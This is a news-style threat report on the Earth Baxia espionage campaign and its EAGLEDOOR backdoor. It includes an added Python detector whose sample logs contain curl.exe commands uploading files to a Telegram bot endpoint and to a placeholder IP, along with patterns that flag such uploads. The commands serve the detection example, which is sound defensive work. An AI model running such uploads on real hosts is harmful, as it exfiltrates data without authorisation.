Admin

EAGLEDOOR Malware Targeting APAC Nations through Exploited GeoServer Vulnerability by Chinese Hackers

In July 2024, cybersecurity firm Trend Micro discovered a suspected advanced persistent threat (APT) originating from China that targeted a government organization in Taiwan. The threat actor, known as Earth Baxia, exploited a recently patched security flaw in OSGeo GeoServer GeoTools. This intrusion activity is believed to have targeted government agencies, telecommunication businesses, and the energy industry in the Philippines, South Korea, Vietnam, Taiwan, and Thailand. Although the lure documents were found in Simplified Chinese, it is uncertain which specific sectors within China were affected.

The attack used a multi-stage infection chain that combined spear-phishing emails with exploitation of the GeoServer flaw to deliver Cobalt Strike and a previously unknown backdoor named EAGLEDOOR. These tools let the threat actor collect sensitive information and stage further payloads. Two additional techniques, GrimResource and AppDomainManager injection, were used to deploy those payloads in a way designed to deceive victims. The first, GrimResource, downloaded the next-stage malware through a decoy MSC file known as RIPCOY that was embedded in a ZIP archive attachment.

Interestingly, the Japanese cybersecurity company NTT Security Holdings recently reported activity by a cluster linked to APT41 that used the same techniques to target Taiwan, the Philippine military, and Vietnamese energy organizations. The two intrusion sets share several traits, including Cobalt Strike command-and-control (C2) domains that impersonate well-known providers such as Amazon Web Services and Microsoft Azure, and even Trend Micro itself. The ultimate goal of these attacks is to deploy a custom variant of Cobalt Strike that acts as a launchpad for the EAGLEDOOR backdoor.

The EAGLEDOOR backdoor, also known as “Eagle.dll,” supports four communication methods with the C2 server: DNS, HTTP, TCP, and Telegram. While the first three protocols are primarily used to transmit victim status information, the core functionality is achieved through the Telegram Bot API. This API allows for the upload and download of files and the execution of additional payloads. Harvested data is then exfiltrated using curl.exe.
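The two traits above that a defender can most readily look for are outbound use of the Telegram Bot API from machines that have no business talking to a chat service, and curl.exe being used to push files off a host. The following is an added example, not code from the article or from Trend Micro, showing a small detection pass over constructed endpoint telemetry. The JSON-lines schema, host names, command lines and the `SERVER_HOSTS` inventory are all assumptions made for the example; only the `api.telegram.org` host and the `/bot<id>:<secret>/` URL shape of the Telegram Bot API are real.

```python
"""Flag the EAGLEDOOR-style exfiltration pattern (curl.exe to the Telegram Bot API)
in constructed process-creation and DNS-query telemetry.

Added example for illustration; not the article's or Trend Micro's code.
"""
import json
import re

# Constructed sample telemetry in a hypothetical JSON-lines format (not Sysmon's
# or any vendor's schema). The bot token below is a placeholder, not a real one.
_SAMPLE_RECORDS = [
    {"host": "fileserver01", "event": "process_create",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -F document=@C:\Users\Public\o.zip "
                "https://api.telegram.org/bot000000000:TOKEN_PLACEHOLDER/sendDocument"},
    {"host": "fileserver01", "event": "dns_query", "query": "api.telegram.org"},
    {"host": "ws-alice", "event": "process_create",
     "image": r"C:\Program Files\Telegram Desktop\Telegram.exe",
     "cmdline": "Telegram.exe"},
    {"host": "ws-alice", "event": "dns_query", "query": "api.telegram.org"},
    {"host": "build02", "event": "process_create",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -sL https://example.com/tool.zip -o tool.zip"},
    {"host": "build02", "event": "process_create",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -T C:\backup\db.bak https://203.0.113.10/upload"},
]
SAMPLE_LOG_LINES = [json.dumps(r) for r in _SAMPLE_RECORDS]

# Assumption: a site-specific inventory of server-class hosts on which a desktop
# chat client is never expected, so any Telegram lookup from them is anomalous.
SERVER_HOSTS = {"fileserver01", "build02"}

TELEGRAM_API_HOST = "api.telegram.org"
# Real shape of a Telegram Bot API path: /bot<numeric id>:<secret>/<method>
BOT_TOKEN_PATH = re.compile(r"/bot\d+:[A-Za-z0-9_-]+/")
# curl switches that send local data to a remote server (multipart, PUT, -d @file).
UPLOAD_SWITCHES = re.compile(r"(?:^|\s)(?:-F|-T|--upload-file|--data-binary\s+@|-d\s+@)")


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_suspicious_events(lines) -> list[dict]:
    """Return one finding per matched rule; a single event may trigger several."""
    findings = []
    for line in lines:
        rec = json.loads(line)
        host = rec.get("host", "?")
        if rec.get("event") == "process_create":
            image = _basename(rec.get("image", ""))
            cmd = rec.get("cmdline", "")
            if image == "curl.exe" and TELEGRAM_API_HOST in cmd:
                findings.append({"host": host, "rule": "curl_to_telegram_bot_api", "detail": cmd})
            elif BOT_TOKEN_PATH.search(cmd):
                # Any other binary carrying a bot token in its command line.
                findings.append({"host": host, "rule": "bot_token_in_cmdline", "detail": cmd})
            if image == "curl.exe" and UPLOAD_SWITCHES.search(cmd):
                findings.append({"host": host, "rule": "curl_file_upload", "detail": cmd})
        elif rec.get("event") == "dns_query":
            if rec.get("query", "").lower() == TELEGRAM_API_HOST and host in SERVER_HOSTS:
                findings.append({"host": host, "rule": "telegram_dns_from_server",
                                 "detail": rec["query"]})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_events(SAMPLE_LOG_LINES):
        print(f"{f['host']:<13} {f['rule']:<26} {f['detail']}")
```

On the constructed sample this yields four findings: two for the curl.exe upload to the Telegram Bot API on fileserver01 (one per rule), one for that server's DNS lookup of api.telegram.org, and one for the plain curl.exe upload from build02. The workstation running a legitimate Telegram client produces nothing, which is the point of keying the DNS rule on a host inventory rather than on the domain alone.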

The researchers at Trend Micro believe that Earth Baxia is based in China and conducted a sophisticated campaign targeting government and energy sectors in multiple Asia-Pacific countries. The threat actor utilized advanced techniques, including GeoServer exploitation, spear-phishing, and customized malware, to infiltrate and exfiltrate data. One notable aspect of this campaign is the use of public cloud services to host malicious files, as well as the multi-protocol support of EAGLEDOOR, which demonstrates the complexity and adaptability of the attacker’s operations.

In conclusion, the discovery of this APT campaign highlights the ongoing threat that cyber espionage poses to governments and critical industries in the Asia-Pacific region. The use of advanced techniques and customized malware showcases the sophistication and determination of threat actors like Earth Baxia. It is crucial for organizations and individuals to remain vigilant, keeping their software up to date and implementing robust cybersecurity measures to protect against such targeted attacks.
